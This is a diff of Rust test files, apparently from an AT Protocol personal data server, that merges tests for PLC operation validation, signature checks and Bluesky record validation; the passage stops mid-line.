··· 13 let op = json!({ 14 "type": "plc_operation", 15 "rotationKeys": [did_key.clone()], 16 + "verificationMethods": { "atproto": did_key.clone() }, 17 "alsoKnownAs": ["at://test.handle"], 18 "services": { 19 "atproto_pds": { ··· 27 } 28 29 #[test] 30 + fn test_plc_operation_basic_validation() { 31 let op = create_valid_operation(); 32 + assert!(validate_plc_operation(&op).is_ok()); 33 + 34 + let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 35 + assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 36 37 + let invalid_type = json!({ "type": "invalid_type", "sig": "test" }); 38 + assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 39 40 + let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 41 + assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 42 43 + let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" }); 44 + assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 45 46 + let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" }); 47 + assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 48 49 + let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" }); 50 + assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 51 52 + let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" }); 53 + assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 54 55 + assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_)))); 56 } 57 58 #[test] 59 + fn test_plc_submission_validation() { 60 let key = SigningKey::random(&mut rand::thread_rng()); 61 let did_key = signing_key_to_did_key(&key); 62 let server_key = "did:key:zServer123"; 63 + 64 + let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({ 65 "type": "plc_operation", 66 + "rotationKeys": [rotation_key], 67 + "verificationMethods": {"atproto": signing_key}, 68 + "alsoKnownAs": [format!("at://{}", handle)], 69 + "services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } }, 70 "sig": "test" 71 }); 72 + 73 let ctx = PlcValidationContext { 74 server_rotation_key: server_key.to_string(), 75 expected_signing_key: did_key.clone(), 76 expected_handle: "test.handle".to_string(), 77 expected_pds_endpoint: "https://pds.example.com".to_string(), 78 }; 79 80 + let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 81 + assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 82 83 + let ctx_with_user_key = PlcValidationContext { 84 server_rotation_key: did_key.clone(), 85 expected_signing_key: did_key.clone(), 86 expected_handle: "test.handle".to_string(), 87 expected_pds_endpoint: "https://pds.example.com".to_string(), 88 }; 89 90 + let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 91 + assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 92 93 + let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com"); 94 + assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 95 + 96 + let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com"); 97 + assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 98 + 99 + let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com"); 100 + assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 101 } 102 103 #[test] 104 + fn test_signature_verification() { 105 let key = SigningKey::random(&mut rand::thread_rng()); 106 let did_key = signing_key_to_did_key(&key); 107 let op = json!({ 108 + "type": "plc_operation", "rotationKeys": [did_key.clone()], 109 + "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "prev": null 110 }); 111 let signed = sign_operation(&op, &key).unwrap(); 112 + let result = verify_operation_signature(&signed, &[did_key.clone()]); 113 + assert!(result.is_ok() && result.unwrap()); 114 115 let other_key = SigningKey::random(&mut rand::thread_rng()); 116 + let other_did = signing_key_to_did_key(&other_key); 117 + let result = verify_operation_signature(&signed, &[other_did]); 118 + assert!(result.is_ok() && !result.unwrap()); 119 120 + let result = verify_operation_signature(&signed, &["not-a-did-key".to_string()]); 121 + assert!(result.is_ok() && !result.unwrap()); 122 123 + let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} }); 124 + assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 125 + 126 + let invalid_base64 = json!({ 127 + "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 128 + "alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!" 129 }); 130 + assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_)))); 131 } 132 133 #[test] 134 + fn test_cid_and_key_utilities() { 135 + let value = json!({ "alpha": 1, "beta": 2 }); 136 let cid1 = cid_for_cbor(&value).unwrap(); 137 let cid2 = cid_for_cbor(&value).unwrap(); 138 + assert_eq!(cid1, cid2, "CID should be deterministic"); 139 + assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256"); 140 141 + let value2 = json!({ "alpha": 999 }); 142 + let cid3 = cid_for_cbor(&value2).unwrap(); 143 + assert_ne!(cid1, cid3, "Different data should produce different CIDs"); 144 145 let key = SigningKey::random(&mut rand::thread_rng()); 146 + let did = signing_key_to_did_key(&key); 147 + assert!(did.starts_with("did:key:z") && did.len() > 50); 148 + assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did"); 149 150 let key2 = SigningKey::random(&mut rand::thread_rng()); 151 + assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids"); 152 } 153 154 #[test] 155 + fn test_tombstone_operations() { 156 + let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" }); 157 + assert!(validate_plc_operation(&tombstone).is_ok()); 158 159 let key = SigningKey::random(&mut rand::thread_rng()); 160 let did_key = signing_key_to_did_key(&key); 161 let ctx = PlcValidationContext { 162 server_rotation_key: did_key.clone(), 163 expected_signing_key: did_key, 164 expected_handle: "test.handle".to_string(), 165 expected_pds_endpoint: "https://pds.example.com".to_string(), 166 }; 167 + assert!(validate_plc_operation_for_submission(&tombstone, &ctx).is_ok()); 168 } 169 170 #[test] 171 + fn test_sign_operation_and_struct() { 172 + let key = SigningKey::random(&mut rand::thread_rng()); 173 let op = json!({ 174 + "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, 175 + "alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature" 176 }); 177 + let signed = sign_operation(&op, &key).unwrap(); 178 + assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature"); 179 180 let mut services = HashMap::new(); 181 + services.insert("atproto_pds".to_string(), PlcService { 182 + service_type: "AtprotoPersonalDataServer".to_string(), 183 + endpoint: "https://pds.example.com".to_string(), 184 + }); 185 let mut verification_methods = HashMap::new(); 186 verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string()); 187 let op = PlcOperation {
+129 -356
tests/record_validation.rs
··· 9 } 10 11 #[test] 12 - fn test_validate_post_valid() { 13 let validator = RecordValidator::new(); 14 - let post = json!({ 15 "$type": "app.bsky.feed.post", 16 "text": "Hello world!", 17 "createdAt": now() 18 }); 19 - let result = validator.validate(&post, "app.bsky.feed.post"); 20 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 21 - } 22 23 - #[test] 24 - fn test_validate_post_missing_text() { 25 - let validator = RecordValidator::new(); 26 - let post = json!({ 27 "$type": "app.bsky.feed.post", 28 "createdAt": now() 29 }); 30 - let result = validator.validate(&post, "app.bsky.feed.post"); 31 - assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text")); 32 - } 33 34 - #[test] 35 - fn test_validate_post_missing_created_at() { 36 - let validator = RecordValidator::new(); 37 - let post = json!({ 38 "$type": "app.bsky.feed.post", 39 "text": "Hello" 40 }); 41 - let result = validator.validate(&post, "app.bsky.feed.post"); 42 - assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt")); 43 - } 44 45 - #[test] 46 - fn test_validate_post_text_too_long() { 47 - let validator = RecordValidator::new(); 48 - let long_text = "a".repeat(3001); 49 - let post = json!({ 50 "$type": "app.bsky.feed.post", 51 - "text": long_text, 52 "createdAt": now() 53 }); 54 - let result = validator.validate(&post, "app.bsky.feed.post"); 55 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text")); 56 - } 57 58 - #[test] 59 - fn test_validate_post_text_at_limit() { 60 - let validator = RecordValidator::new(); 61 - let limit_text = "a".repeat(3000); 62 - let post = json!({ 63 "$type": "app.bsky.feed.post", 64 - "text": limit_text, 65 "createdAt": now() 66 }); 67 - let result = validator.validate(&post, "app.bsky.feed.post"); 68 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 69 - } 70 71 - #[test] 72 - fn test_validate_post_too_many_langs() { 73 - let validator = RecordValidator::new(); 74 - let post = json!({ 75 "$type": "app.bsky.feed.post", 76 "text": "Hello", 77 "createdAt": now(), 78 "langs": ["en", "fr", "de", "es"] 79 }); 80 - let result = validator.validate(&post, "app.bsky.feed.post"); 81 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 82 - } 83 84 - #[test] 85 - fn test_validate_post_three_langs_ok() { 86 - let validator = RecordValidator::new(); 87 - let post = json!({ 88 "$type": "app.bsky.feed.post", 89 "text": "Hello", 90 "createdAt": now(), 91 "langs": ["en", "fr", "de"] 92 }); 93 - let result = validator.validate(&post, "app.bsky.feed.post"); 94 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 95 - } 96 97 - #[test] 98 - fn test_validate_post_too_many_tags() { 99 - let validator = RecordValidator::new(); 100 - let post = json!({ 101 "$type": "app.bsky.feed.post", 102 "text": "Hello", 103 "createdAt": now(), 104 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"] 105 }); 106 - let result = validator.validate(&post, "app.bsky.feed.post"); 107 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 108 - } 109 110 - #[test] 111 - fn test_validate_post_eight_tags_ok() { 112 - let validator = RecordValidator::new(); 113 - let post = json!({ 114 "$type": "app.bsky.feed.post", 115 "text": "Hello", 116 "createdAt": now(), 117 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"] 118 }); 119 - let result = validator.validate(&post, "app.bsky.feed.post"); 120 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 121 - } 122 123 - #[test] 124 - fn test_validate_post_tag_too_long() { 125 - let validator = RecordValidator::new(); 126 - let long_tag = "t".repeat(641); 127 - let post = json!({ 128 "$type": "app.bsky.feed.post", 129 "text": "Hello", 130 "createdAt": now(), 131 - "tags": [long_tag] 132 }); 133 - let result = validator.validate(&post, "app.bsky.feed.post"); 134 - assert!( 135 - matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")) 136 - ); 137 } 138 139 #[test] 140 - fn test_validate_profile_valid() { 141 let validator = RecordValidator::new(); 142 - let profile = json!({ 143 "$type": "app.bsky.actor.profile", 144 "displayName": "Test User", 145 "description": "A test user profile" 146 }); 147 - let result = validator.validate(&profile, "app.bsky.actor.profile"); 148 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 149 - } 150 151 - #[test] 152 - fn test_validate_profile_empty_ok() { 153 - let validator = RecordValidator::new(); 154 - let profile = json!({ 155 "$type": "app.bsky.actor.profile" 156 }); 157 - let result = validator.validate(&profile, "app.bsky.actor.profile"); 158 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 159 - } 160 161 - #[test] 162 - fn test_validate_profile_displayname_too_long() { 163 - let validator = RecordValidator::new(); 164 - let long_name = "n".repeat(641); 165 - let profile = json!({ 166 "$type": "app.bsky.actor.profile", 167 - "displayName": long_name 168 }); 169 - let result = validator.validate(&profile, "app.bsky.actor.profile"); 170 - assert!( 171 - matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 172 - ); 173 - } 174 175 - #[test] 176 - fn test_validate_profile_description_too_long() { 177 - let validator = RecordValidator::new(); 178 - let long_desc = "d".repeat(2561); 179 - let profile = json!({ 180 "$type": "app.bsky.actor.profile", 181 - "description": long_desc 182 }); 183 - let result = validator.validate(&profile, "app.bsky.actor.profile"); 184 - assert!( 185 - matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description") 186 - ); 187 } 188 189 #[test] 190 - fn test_validate_like_valid() { 191 let validator = RecordValidator::new(); 192 - let like = json!({ 193 "$type": "app.bsky.feed.like", 194 "subject": { 195 "uri": "at://did:plc:test/app.bsky.feed.post/123", ··· 197 }, 198 "createdAt": now() 199 }); 200 - let result = validator.validate(&like, "app.bsky.feed.like"); 201 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 202 - } 203 204 - #[test] 205 - fn test_validate_like_missing_subject() { 206 - let validator = RecordValidator::new(); 207 - let like = json!({ 208 "$type": "app.bsky.feed.like", 209 "createdAt": now() 210 }); 211 - let result = validator.validate(&like, "app.bsky.feed.like"); 212 - assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 213 - } 214 215 - #[test] 216 - fn test_validate_like_missing_subject_uri() { 217 - let validator = RecordValidator::new(); 218 - let like = json!({ 219 "$type": "app.bsky.feed.like", 220 "subject": { 221 "cid": "bafyreig6xxxxxyyyyyzzzzzz" 222 }, 223 "createdAt": now() 224 }); 225 - let result = validator.validate(&like, "app.bsky.feed.like"); 226 - assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri"))); 227 - } 228 229 - #[test] 230 - fn test_validate_like_invalid_subject_uri() { 231 - let validator = RecordValidator::new(); 232 - let like = json!({ 233 "$type": "app.bsky.feed.like", 234 "subject": { 235 "uri": "https://example.com/not-at-uri", ··· 237 }, 238 "createdAt": now() 239 }); 240 - let result = validator.validate(&like, "app.bsky.feed.like"); 241 - assert!( 242 - matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")) 243 - ); 244 - } 245 246 - #[test] 247 - fn test_validate_repost_valid() { 248 - let validator = RecordValidator::new(); 249 - let repost = json!({ 250 "$type": "app.bsky.feed.repost", 251 "subject": { 252 "uri": "at://did:plc:test/app.bsky.feed.post/123", ··· 254 }, 255 "createdAt": now() 256 }); 257 - let result = validator.validate(&repost, "app.bsky.feed.repost"); 258 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 259 - } 260 261 - #[test] 262 - fn test_validate_repost_missing_subject() { 263 - let validator = RecordValidator::new(); 264 - let repost = json!({ 265 "$type": "app.bsky.feed.repost", 266 "createdAt": now() 267 }); 268 - let result = validator.validate(&repost, "app.bsky.feed.repost"); 269 - assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 270 } 271 272 #[test] 273 - fn test_validate_follow_valid() { 274 let validator = RecordValidator::new(); 275 - let follow = json!({ 276 "$type": "app.bsky.graph.follow", 277 "subject": "did:plc:test12345", 278 "createdAt": now() 279 }); 280 - let result = validator.validate(&follow, "app.bsky.graph.follow"); 281 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 282 - } 283 284 - #[test] 285 - fn test_validate_follow_missing_subject() { 286 - let validator = RecordValidator::new(); 287 - let follow = json!({ 288 "$type": "app.bsky.graph.follow", 289 "createdAt": now() 290 }); 291 - let result = validator.validate(&follow, "app.bsky.graph.follow"); 292 - assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 293 - } 294 295 - #[test] 296 - fn test_validate_follow_invalid_subject() { 297 - let validator = RecordValidator::new(); 298 - let follow = json!({ 299 "$type": "app.bsky.graph.follow", 300 "subject": "not-a-did", 301 "createdAt": now() 302 }); 303 - let result = validator.validate(&follow, "app.bsky.graph.follow"); 304 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 305 - } 306 307 - #[test] 308 - fn test_validate_block_valid() { 309 - let validator = RecordValidator::new(); 310 - let block = json!({ 311 "$type": "app.bsky.graph.block", 312 "subject": "did:plc:blocked123", 313 "createdAt": now() 314 }); 315 - let result = validator.validate(&block, "app.bsky.graph.block"); 316 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 317 - } 318 319 - #[test] 320 - fn test_validate_block_invalid_subject() { 321 - let validator = RecordValidator::new(); 322 - let block = json!({ 323 "$type": "app.bsky.graph.block", 324 "subject": "not-a-did", 325 "createdAt": now() 326 }); 327 - let result = validator.validate(&block, "app.bsky.graph.block"); 328 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 329 } 330 331 #[test] 332 - fn test_validate_list_valid() { 333 let validator = RecordValidator::new(); 334 - let list = json!({ 335 "$type": "app.bsky.graph.list", 336 "name": "My List", 337 "purpose": "app.bsky.graph.defs#modlist", 338 "createdAt": now() 339 }); 340 - let result = validator.validate(&list, "app.bsky.graph.list"); 341 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 342 - } 343 344 - #[test] 345 - fn test_validate_list_name_too_long() { 346 - let validator = RecordValidator::new(); 347 - let long_name = "n".repeat(65); 348 - let list = json!({ 349 "$type": "app.bsky.graph.list", 350 - "name": long_name, 351 "purpose": "app.bsky.graph.defs#modlist", 352 "createdAt": now() 353 }); 354 - let result = validator.validate(&list, "app.bsky.graph.list"); 355 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 356 - } 357 358 - #[test] 359 - fn test_validate_list_empty_name() { 360 - let validator = RecordValidator::new(); 361 - let list = json!({ 362 "$type": "app.bsky.graph.list", 363 "name": "", 364 "purpose": "app.bsky.graph.defs#modlist", 365 "createdAt": now() 366 }); 367 - let result = validator.validate(&list, "app.bsky.graph.list"); 368 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 369 } 370 371 #[test] 372 - fn test_validate_feed_generator_valid() { 373 let validator = RecordValidator::new(); 374 - let generator = json!({ 375 "$type": "app.bsky.feed.generator", 376 "did": "did:web:example.com", 377 "displayName": "My Feed", 378 "createdAt": now() 379 }); 380 - let result = validator.validate(&generator, "app.bsky.feed.generator"); 381 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 382 - } 383 384 - #[test] 385 - fn test_validate_feed_generator_displayname_too_long() { 386 - let validator = RecordValidator::new(); 387 - let long_name = "f".repeat(241); 388 - let generator = json!({ 389 "$type": "app.bsky.feed.generator", 390 "did": "did:web:example.com", 391 - "displayName": long_name, 392 "createdAt": now() 393 }); 394 - let result = validator.validate(&generator, "app.bsky.feed.generator"); 395 - assert!( 396 - matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 397 - ); 398 - } 399 400 - #[test] 401 - fn test_validate_unknown_type_returns_unknown() { 402 - let validator = RecordValidator::new(); 403 - let custom = json!({ 404 - "$type": "com.custom.record", 405 - "data": "test" 406 }); 407 - let result = validator.validate(&custom, "com.custom.record"); 408 - assert_eq!(result.unwrap(), ValidationStatus::Unknown); 409 } 410 411 #[test] 412 - fn test_validate_unknown_type_strict_rejects() { 413 - let validator = RecordValidator::new().require_lexicon(true); 414 - let custom = json!({ 415 "$type": "com.custom.record", 416 "data": "test" 417 }); 418 - let result = validator.validate(&custom, "com.custom.record"); 419 - assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 420 - } 421 422 - #[test] 423 - fn test_validate_type_mismatch() { 424 - let validator = RecordValidator::new(); 425 - let record = json!({ 426 "$type": "app.bsky.feed.like", 427 "subject": {"uri": "at://test", "cid": "bafytest"}, 428 "createdAt": now() 429 }); 430 - let result = validator.validate(&record, "app.bsky.feed.post"); 431 - assert!( 432 - matches!(result, Err(ValidationError::TypeMismatch { expected, actual }) 433 - if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like") 434 - ); 435 - } 436 437 - #[test] 438 - fn test_validate_missing_type() { 439 - let validator = RecordValidator::new(); 440 - let record = json!({ 441 "text": "Hello" 442 }); 443 - let result = validator.validate(&record, "app.bsky.feed.post"); 444 - assert!(matches!(result, Err(ValidationError::MissingType))); 445 - } 446 447 - #[test] 448 - fn test_validate_not_object() { 449 - let validator = RecordValidator::new(); 450 - let record = json!("just a string"); 451 - let result = validator.validate(&record, "app.bsky.feed.post"); 452 - assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 453 - } 454 455 - #[test] 456 - fn test_validate_datetime_format_valid() { 457 - let validator = RecordValidator::new(); 458 - let post = json!({ 459 "$type": "app.bsky.feed.post", 460 "text": "Test", 461 "createdAt": "2024-01-15T10:30:00.000Z" 462 }); 463 - let result = validator.validate(&post, "app.bsky.feed.post"); 464 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 465 - } 466 467 - #[test] 468 - fn test_validate_datetime_with_offset() { 469 - let validator = RecordValidator::new(); 470 - let post = json!({ 471 "$type": "app.bsky.feed.post", 472 "text": "Test", 473 "createdAt": "2024-01-15T10:30:00+05:30" 474 }); 475 - let result = validator.validate(&post, "app.bsky.feed.post"); 476 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 477 - } 478 479 - #[test] 480 - fn test_validate_datetime_invalid_format() { 481 - let validator = RecordValidator::new(); 482 - let post = json!({ 483 "$type": "app.bsky.feed.post", 484 "text": "Test", 485 "createdAt": "2024/01/15" 486 }); 487 - let result = validator.validate(&post, "app.bsky.feed.post"); 488 - assert!(matches!( 489 - result, 490 - Err(ValidationError::InvalidDatetime { .. }) 491 - )); 492 } 493 494 #[test] 495 - fn test_validate_record_key_valid() { 496 assert!(validate_record_key("3k2n5j2").is_ok()); 497 assert!(validate_record_key("valid-key").is_ok()); 498 assert!(validate_record_key("valid_key").is_ok()); 499 assert!(validate_record_key("valid.key").is_ok()); 500 assert!(validate_record_key("valid~key").is_ok()); 501 assert!(validate_record_key("self").is_ok()); 502 - } 503 504 - #[test] 505 - fn test_validate_record_key_empty() { 506 - let result = validate_record_key(""); 507 - assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 508 - } 509 510 - #[test] 511 - fn test_validate_record_key_dot() { 512 assert!(validate_record_key(".").is_err()); 513 assert!(validate_record_key("..").is_err()); 514 - } 515 516 - #[test] 517 - fn test_validate_record_key_invalid_chars() { 518 assert!(validate_record_key("invalid/key").is_err()); 519 assert!(validate_record_key("invalid key").is_err()); 520 assert!(validate_record_key("invalid@key").is_err()); 521 assert!(validate_record_key("invalid#key").is_err()); 522 - } 523 524 - #[test] 525 - fn test_validate_record_key_too_long() { 526 - let long_key = "k".repeat(513); 527 - let result = validate_record_key(&long_key); 528 - assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 529 } 530 531 #[test] 532 - fn test_validate_record_key_at_max_length() { 533 - let max_key = "k".repeat(512); 534 - assert!(validate_record_key(&max_key).is_ok()); 535 - } 536 - 537 - #[test] 538 - fn test_validate_collection_nsid_valid() { 539 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok()); 540 assert!(validate_collection_nsid("com.atproto.repo.record").is_ok()); 541 assert!(validate_collection_nsid("a.b.c").is_ok()); 542 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 543 - } 544 545 - #[test] 546 - fn test_validate_collection_nsid_empty() { 547 - let result = validate_collection_nsid(""); 548 - assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 549 - } 550 551 - #[test] 552 - fn test_validate_collection_nsid_too_few_segments() { 553 assert!(validate_collection_nsid("a").is_err()); 554 assert!(validate_collection_nsid("a.b").is_err()); 555 - } 556 557 - #[test] 558 - fn test_validate_collection_nsid_empty_segment() { 559 assert!(validate_collection_nsid("a..b.c").is_err()); 560 assert!(validate_collection_nsid(".a.b.c").is_err()); 561 assert!(validate_collection_nsid("a.b.c.").is_err()); 562 - } 563 564 - #[test] 565 - fn test_validate_collection_nsid_invalid_chars() { 566 assert!(validate_collection_nsid("a.b.c/d").is_err()); 567 assert!(validate_collection_nsid("a.b.c_d").is_err()); 568 assert!(validate_collection_nsid("a.b.c@d").is_err()); 569 } 570 - 571 - #[test] 572 - fn test_validate_threadgate() { 573 - let validator = RecordValidator::new(); 574 - let gate = json!({ 575 - "$type": "app.bsky.feed.threadgate", 576 - "post": "at://did:plc:test/app.bsky.feed.post/123", 577 - "createdAt": now() 578 - }); 579 - let result = validator.validate(&gate, "app.bsky.feed.threadgate"); 580 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 581 - } 582 - 583 - #[test] 584 - fn test_validate_labeler_service() { 585 - let validator = RecordValidator::new(); 586 - let labeler = json!({ 587 - "$type": "app.bsky.labeler.service", 588 - "policies": { 589 - "labelValues": ["spam", "nsfw"] 590 - }, 591 - "createdAt": now() 592 - }); 593 - let result = validator.validate(&labeler, "app.bsky.labeler.service"); 594 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 595 - } 596 - 597 - #[test] 598 - fn test_validate_list_item() { 599 - let validator = RecordValidator::new(); 600 - let item = json!({ 601 - "$type": "app.bsky.graph.listitem", 602 - "subject": "did:plc:test123", 603 - "list": "at://did:plc:owner/app.bsky.graph.list/mylist", 604 - "createdAt": now() 605 - }); 606 - let result = validator.validate(&item, "app.bsky.graph.listitem"); 607 - assert_eq!(result.unwrap(), ValidationStatus::Valid); 608 - }
··· 9 } 10 11 #[test] 12 + fn test_post_record_validation() { 13 let validator = RecordValidator::new(); 14 + 15 + let valid_post = json!({ 16 "$type": "app.bsky.feed.post", 17 "text": "Hello world!", 18 "createdAt": now() 19 }); 20 + assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 21 22 + let missing_text = json!({ 23 "$type": "app.bsky.feed.post", 24 "createdAt": now() 25 }); 26 + assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text")); 27 28 + let missing_created_at = json!({ 29 "$type": "app.bsky.feed.post", 30 "text": "Hello" 31 }); 32 + assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt")); 33 34 + let text_too_long = json!({ 35 "$type": "app.bsky.feed.post", 36 + "text": "a".repeat(3001), 37 "createdAt": now() 38 }); 39 + assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text")); 40 41 + let text_at_limit = json!({ 42 "$type": "app.bsky.feed.post", 43 + "text": "a".repeat(3000), 44 "createdAt": now() 45 }); 46 + assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 47 48 + let too_many_langs = json!({ 49 "$type": "app.bsky.feed.post", 50 "text": "Hello", 51 "createdAt": now(), 52 "langs": ["en", "fr", "de", "es"] 53 }); 54 + assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 55 56 + let three_langs_ok = json!({ 57 "$type": "app.bsky.feed.post", 58 "text": "Hello", 59 "createdAt": now(), 60 "langs": ["en", "fr", "de"] 61 }); 62 + assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 63 64 + let too_many_tags = json!({ 65 "$type": "app.bsky.feed.post", 66 "text": "Hello", 67 "createdAt": now(), 68 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"] 69 }); 70 + assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 71 72 + let eight_tags_ok = json!({ 73 "$type": "app.bsky.feed.post", 74 "text": "Hello", 75 "createdAt": now(), 76 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"] 77 }); 78 + assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 79 80 + let tag_too_long = json!({ 81 "$type": "app.bsky.feed.post", 82 "text": "Hello", 83 "createdAt": now(), 84 + "tags": ["t".repeat(641)] 85 }); 86 + assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 87 } 88 89 #[test] 90 + fn test_profile_record_validation() { 91 let validator = RecordValidator::new(); 92 + 93 + let valid = json!({ 94 "$type": "app.bsky.actor.profile", 95 "displayName": "Test User", 96 "description": "A test user profile" 97 }); 98 + assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid); 99 100 + let 